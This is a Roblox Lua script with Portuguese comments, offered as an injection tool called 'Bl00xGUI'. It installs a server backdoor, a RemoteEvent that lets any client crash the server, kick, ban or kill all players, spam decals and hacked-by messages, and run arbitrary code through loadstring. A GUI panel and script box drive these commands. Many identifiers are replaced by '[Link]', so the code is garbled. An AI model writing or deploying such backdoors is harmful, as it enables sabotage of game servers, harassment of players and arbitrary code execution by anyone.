-- Script de injeção completo e corrigido para Bl00xGUI com IDE
local Players = game:GetService("Players") local ReplicatedStorage =
game:GetService("ReplicatedStorage") local Lighting = game:GetService("Lighting")
local CoreGui = game:GetService("CoreGui") local RunService =
game:GetService("RunService") local UserInputService =
game:GetService("UserInputService") -- Função para injetar a backdoor no servidor
local function injectBackdoor() print("Injetando backdoor no servidor...")
-- Criar mensagem inicial local
initpayloadmsg = [Link]("Hint") [Link] = "payloadmsg"
[Link] = "Init Payload Received! Loading Bl00xGUI..."
[Link] = workspace
-- Criar RemoteEvent para comunicação
local remoteEvent = [Link]("RemoteEvent") [Link] = "Bl00xGUIEvent"
[Link] = ReplicatedStorage
-- Funções do servidor
local function crashServer() while true do end end local function decalSpam() for i
= 1, 50 do local decal = [Link]("Decal") [Link] =
"rbxassetid://70727201" [Link] = [Link] [Link] =
[Link] [Link] = [Link]([Link](-100,100), 50,
[Link](-100,100)) game:GetService("Debris"):AddItem(decal, 10) end end local
function createMessage() local msg = [Link]("Message", workspace) [Link] =
"!!!YOU HAVE BEEN HACKED BY BL00XKID!!!" [Link](5, function() msg:Destroy()
end) end local function createHint() local hint = [Link]("Hint", workspace)
[Link] = "!!!THIS SERVER IS SECURED BY BL00XKID!!!" [Link](5, function()
hint:Destroy() end) end local bannedPlayers = {} local function permaban(player)
bannedPlayers[[Link]] = true player:Kick("PERMANENT BAN - ADMIN ACTION") end
local function kickPlayers() for _, p in pairs(Players:GetPlayers()) do
p:Kick("ADMINISTRATIVE ACTION") end end local function changeSkybox() local sky =
[Link]("Sky") [Link] = "rbxassetid://1234567" [Link] =
"rbxassetid://1234567" [Link] = "rbxassetid://1234567" [Link] =
"rbxassetid://1234567" [Link] = "rbxassetid://1234567" [Link] =
"rbxassetid://1234567" [Link] = Lighting end local function animatedSkybox()
local imageIds = { "rbxassetid://169585459", "rbxassetid://169585475",
"rbxassetid://169585485", "rbxassetid://169585502", "rbxassetid://169585515",
"rbxassetid://169585502", "rbxassetid://169585485", "rbxassetid://169585475" }
local sky = [Link]("Sky", Lighting) for _, prop in pairs({"SkyboxBk",
"SkyboxDn", "SkyboxFt", "SkyboxLf", "SkyboxRt", "SkyboxUp"}) do sky[prop] =
imageIds[1] end while true do for _, imageId in ipairs(imageIds) do for _, prop in
pairs({"SkyboxBk", "SkyboxDn", "SkyboxFt", "SkyboxLf", "SkyboxRt", "SkyboxUp"}) do
sky[prop] = imageId end [Link](0.25) end end end local function killAll() for _,
p in pairs(Players:GetPlayers()) do if [Link] and
[Link]:FindFirstChild("Humanoid") then [Link] = 0 end end
end
-- Função para executar scripts arbitrários
local function executeScript(scriptSrc) local success, err = pcall(function() local
fn, err2 = loadstring(scriptSrc) if fn then setfenv(fn, getfenv()) fn() else
error(err2) end end) if not success then warn("Erro ao executar script: " ..
tostring(err)) end end -- Ouvinte de eventos
[Link]:Connect(function(player, command, ...) local args = {...}
if command == "crashServer" then crashServer() elseif command == "decalSpam" then
decalSpam() elseif command == "createMessage" then createMessage() elseif command
== "createHint" then createHint() elseif command == "permaban" then
permaban(player) elseif command == "kickPlayers" then kickPlayers() elseif command
== "changeSkybox" then changeSkybox() elseif command == "animatedSkybox" then
[Link](animatedSkybox) elseif command == "killAll" then killAll() elseif
command == "executeScript" then executeScript(args[1]) end end) -- Sistema de
banimento [Link]:Connect(function(plr) if bannedPlayers[[Link]]
then plr:Kick("PERMANENT BAN - ADMIN ACTION") end end) print("Backdoor injetada com
sucesso no servidor!") end
local function createMobileGUI() print("Criando GUI Mobile...") -- Remover GUI
existente if CoreGui:FindFirstChild("Bl00xGUIMobile") then
CoreGui:FindFirstChild("Bl00xGUIMobile"):Destroy() end -- Elementos principais
local ScreenGui = [Link]("ScreenGui") local MainFrame = [Link]("Frame")
local TitleBar = [Link]("Frame") local TitleLabel = [Link]("TextLabel")
local CloseButton = [Link]("TextButton") local TabBar = [Link]("Frame")
local TabButtons = [Link]("Frame") local UICorner = [Link]("UICorner")
local ContentFrame = [Link]("ScrollingFrame") local CommandButtonsLayout =
[Link]("UIGridLayout") -- Configuração da GUI [Link] =
"Bl00xGUIMobile" [Link] = [Link]
[Link] = CoreGui [Link] = "MainFrame" MainFrame.BackgroundColor3
= [Link](0, 0, 0) [Link] = 0 [Link] =
[Link](0.05, 0, 0.05, 0) [Link] = [Link](0.9, 0, 0.9, 0)
[Link] = ScreenGui [Link] = [Link](0.05, 0)
[Link] = MainFrame -- Barra de título (arrastável) [Link] =
"TitleBar" TitleBar.BackgroundColor3 = [Link](17, 0, 255) [Link] =
[Link](1, 0, 0.08, 0) [Link] = MainFrame [Link] = "TitleLabel"
[Link] = [Link] [Link] = "Bl00xGUI v1"
TitleLabel.TextColor3 = [Link](255, 255, 255) [Link] = 28
[Link] = 1 [Link] = [Link](0.8, 0, 1, 0)
[Link] = [Link](0.1, 0, 0, 0) [Link] = TitleBar -- Botão
de fechar [Link] = "CloseButton" [Link] = "X" [Link]
= [Link] [Link] = 24 CloseButton.TextColor3 =
[Link](255, 255, 255) CloseButton.BackgroundColor3 = [Link](200, 0,
0) [Link] = [Link](0.1, 0, 1, 0) [Link] = [Link](0.9,
0, 0, 0) [Link] = TitleBar -- Sistema de arrasto local dragging,
dragInput, mousePos, framePos [Link]:Connect(function(input) if
[Link] == [Link] then dragging = true mousePos =
[Link] framePos = [Link] end end)
[Link]:Connect(function(input) if [Link] ==
[Link] or [Link] == [Link]
then dragInput = input end end)
[Link]:Connect(function(input) if dragging and input ==
dragInput then local delta = [Link] - mousePos [Link] =
[Link]( [Link], [Link] + delta.X, [Link],
[Link] + delta.Y ) end end) [Link]:Connect(function(input)
if [Link] == [Link] then dragging = false end end)
-- Barra de abas
[Link] = "TabBar" TabBar.BackgroundColor3 = [Link](10, 10, 10)
[Link] = [Link](0, 0, 0.08, 0) [Link] = [Link](1, 0, 0.1, 0)
[Link] = MainFrame [Link] = "TabButtons"
[Link] = 1 [Link] = [Link](0.8, 0, 1, 0)
[Link] = [Link](0.1, 0, 0, 0) [Link] = TabBar -- Botões
de navegação local CommandsTab = [Link]("TextButton") [Link] =
"CommandsTab" [Link] = "Comandos" [Link] = [Link]
[Link] = 18 CommandsTab.TextColor3 = [Link](255, 255, 255)
CommandsTab.BackgroundColor3 = [Link](0, 13, 255) [Link] =
[Link](0.45, 0, 0.8, 0) [Link] = [Link](0, 0, 0.1, 0)
[Link] = TabButtons local IDETab = [Link]("TextButton")
[Link] = "IDETab" [Link] = "IDE" [Link] = [Link]
[Link] = 18 IDETab.TextColor3 = [Link](200, 200, 200)
IDETab.BackgroundColor3 = [Link](30, 30, 30) [Link] = [Link](0.45,
0, 0.8, 0) [Link] = [Link](0.55, 0, 0.1, 0) [Link] = TabButtons
-- Frame de conteúdo [Link] = "ContentFrame"
[Link] = 1 [Link] = [Link](0, 0,
0.18, 0) [Link] = [Link](1, 0, 0.82, 0) [Link] =
[Link](0, 0, 2.0, 0) [Link] = 6 [Link] =
MainFrame -- Layout para botões de comando [Link] =
"CommandButtonsLayout" [Link] = [Link](0.02, 0, 0.02,
0) [Link] = [Link](0.48, 0, 0.15, 0)
[Link] = [Link]
[Link] = [Link]
[Link] = [Link]
[Link] = [Link]
[Link] = ContentFrame
-- Botões de comando local
buttonCommands = { {Name = "DecalSpamButton", Text = "Decal Spam", Command =
"decalSpam"}, {Name = "CrashServerButton", Text = "Crash Server", Command =
"crashServer"}, {Name = "ChangeSkyboxButton", Text = "Skybox", Command =
"changeSkybox"}, {Name = "AnimatedSkyboxButton", Text = "Animated Sky", Command =
"animatedSkybox"}, {Name = "CreateMessageButton", Text = "Announcement", Command =
"createMessage"}, {Name = "CreateHintButton", Text = "Hint", Command =
"createHint"}, {Name = "KillAllButton", Text = "Kill All", Command = "killAll"},
{Name = "KickButton", Text = "Kick Players", Command = "kickPlayers"}, {Name =
"PermabanButton", Text = "Ban Players", Command = "permaban"}, {Name =
"PlayMusicButton", Text = "Play Music", Command = "playMusic"} } for _, btnInfo in
ipairs(buttonCommands) do local btn = [Link]("TextButton") [Link] =
[Link] [Link] = [Link] [Link] = [Link] btn.TextColor3 =
[Link](255, 255, 255) [Link] = 14 btn.BackgroundColor3 =
[Link](0, 0, 0) btn.BorderColor3 = [Link](0, 13, 255)
[Link] = 3 [Link] = [Link](1, 0, 1, 0) [Link] = ContentFrame
end -- Área do IDE (inicialmente oculta) local IDEContainer = [Link]("Frame")
[Link] = "IDEContainer" [Link] = 1
[Link] = [Link](1, 0, 1, 0) [Link] = false
[Link] = ContentFrame local ScriptBox = [Link]("TextBox")
[Link] = "ScriptBox" [Link] = "-- Digite seu script aqui"
ScriptBox.TextColor3 = [Link](200, 200, 200) ScriptBox.BackgroundColor3 =
[Link](30, 30, 30) [Link] = [Link](0.95, 0, 0.6, 0)
[Link] = [Link](0.025, 0, 0.02, 0) [Link] = true
[Link] = [Link] [Link] =
[Link] [Link] = [Link] [Link] = 14
[Link] = false [Link] = IDEContainer -- Botões do IDE
local ExecuteServer = [Link]("TextButton") [Link] =
"ExecuteServer" [Link] = "Executar no Servidor" [Link] =
[Link] [Link] = 14 ExecuteServer.TextColor3 =
[Link](255, 255, 255) ExecuteServer.BackgroundColor3 = [Link](0, 0,
0) ExecuteServer.BorderColor3 = [Link](0, 13, 255)
[Link] = 3 [Link] = [Link](0.95, 0, 0.1, 0)
[Link] = [Link](0.025, 0, 0.65, 0) [Link] =
IDEContainer local ExecuteClient = [Link]("TextButton") [Link] =
"ExecuteClient" [Link] = "Executar no Cliente" [Link] =
[Link] [Link] = 14 ExecuteClient.TextColor3 =
[Link](255, 255, 255) ExecuteClient.BackgroundColor3 = [Link](0, 0,
0) ExecuteClient.BorderColor3 = [Link](0, 13, 255)
[Link] = 3 [Link] = [Link](0.95, 0, 0.1, 0)
[Link] = [Link](0.025, 0, 0.77, 0) [Link] =
IDEContainer local ClearButton = [Link]("TextButton") [Link] =
"ClearButton" [Link] = "Limpar Script" [Link] =
[Link] [Link] = 14 ClearButton.TextColor3 =
[Link](255, 255, 255) ClearButton.BackgroundColor3 = [Link](0, 0,
0) ClearButton.BorderColor3 = [Link](0, 13, 255)
[Link] = 3 [Link] = [Link](0.95, 0, 0.1, 0)
[Link] = [Link](0.025, 0, 0.89, 0) [Link] =
IDEContainer -- Funcionalidade das abas local function showCommands()
[Link] = [Link](0, 0, 2.0, 0)
ContentFrame:FindFirstChild("CommandButtonsLayout").Parent = ContentFrame
[Link] = false CommandsTab.BackgroundColor3 = [Link](0, 13,
255) IDETab.BackgroundColor3 = [Link](30, 30, 30) CommandsTab.TextColor3 =
[Link](255, 255, 255) IDETab.TextColor3 = [Link](200, 200, 200) end
local function showIDE() [Link] = [Link](0, 0, 1.5, 0)
ContentFrame:FindFirstChild("CommandButtonsLayout").Parent = nil
[Link] = true CommandsTab.BackgroundColor3 = [Link](30, 30,
30) IDETab.BackgroundColor3 = [Link](0, 13, 255) CommandsTab.TextColor3 =
[Link](200, 200, 200) IDETab.TextColor3 = [Link](255, 255, 255) end
CommandsTab.MouseButton1Click:Connect(showCommands)
IDETab.MouseButton1Click:Connect(showIDE) showCommands() -- Mostrar comandos por
padrão -- Funcionalidade do IDE [Link]:Connect(function() if
[Link] == "-- Digite seu script aqui" then [Link] = ""
ScriptBox.TextColor3 = [Link](255, 255, 255) end end) -- Conectar
funcionalidades local remoteEvent =
ReplicatedStorage:FindFirstChild("Bl00xGUIEvent") local SoundService =
game:GetService("SoundService") local function safeFireServer(command, ...) if
remoteEvent then remoteEvent:FireServer(command, ...) else warn("Backdoor não
encontrada! Comando:", command) end end -- Função para tocar música local function
playMusic() local sound = [Link]("Sound") [Link] =
"rbxassetid://138081566" [Link] = 1 [Link] = true [Link] =
SoundService sound:Play() end -- Conectar botões de comando
[Link].MouseButton1Click:Connect(function()
safeFireServer("decalSpam") end)
[Link].MouseButton1Click:Connect(function()
safeFireServer("crashServer") end)
[Link].MouseButton1Click:Connect(function()
safeFireServer("changeSkybox") end)
[Link].MouseButton1Click:Connect(function()
safeFireServer("animatedSkybox") end)
[Link].MouseButton1Click:Connect(function()
safeFireServer("createMessage") end)
[Link].MouseButton1Click:Connect(function()
safeFireServer("createHint") end)
[Link].MouseButton1Click:Connect(function()
safeFireServer("killAll") end)
[Link].MouseButton1Click:Connect(function()
safeFireServer("kickPlayers") end)
[Link].MouseButton1Click:Connect(function()
safeFireServer("permaban") end)
[Link].MouseButton1Click:Connect(playMusic) -- Conectar
botões do IDE [Link].MouseButton1Click:Connect(function()
[Link] = "" ScriptBox.TextColor3 = [Link](255, 255, 255) end)
[Link].MouseButton1Click:Connect(function() local scriptSrc =
[Link] local success, err = pcall(function() local fn =
loadstring(scriptSrc) if fn then setfenv(fn, getfenv()) fn() else error(err) end
end) if not success then warn("Erro no cliente: " .. tostring(err)) end end)
[Link].MouseButton1Click:Connect(function()
safeFireServer("executeScript", [Link]) end) -- Botão de fechar
CloseButton.MouseButton1Click:Connect(function() ScreenGui:Destroy() end)
print("GUI Mobile criada com sucesso!") end -- Atualizar a seção de execução
principal if RunService:IsStudio() then injectBackdoor() if
[Link] then createMobileGUI() end elseif
RunService:IsServer() then injectBackdoor() else if [Link]
then createMobileGUI() end end -- Executar injeção de forma segura if
RunService:IsStudio() then injectBackdoor() createMobileGUI() elseif
RunService:IsServer() then injectBackdoor() else createMobileGUI()
end
print("Bl00xGUI carregada com sucesso!")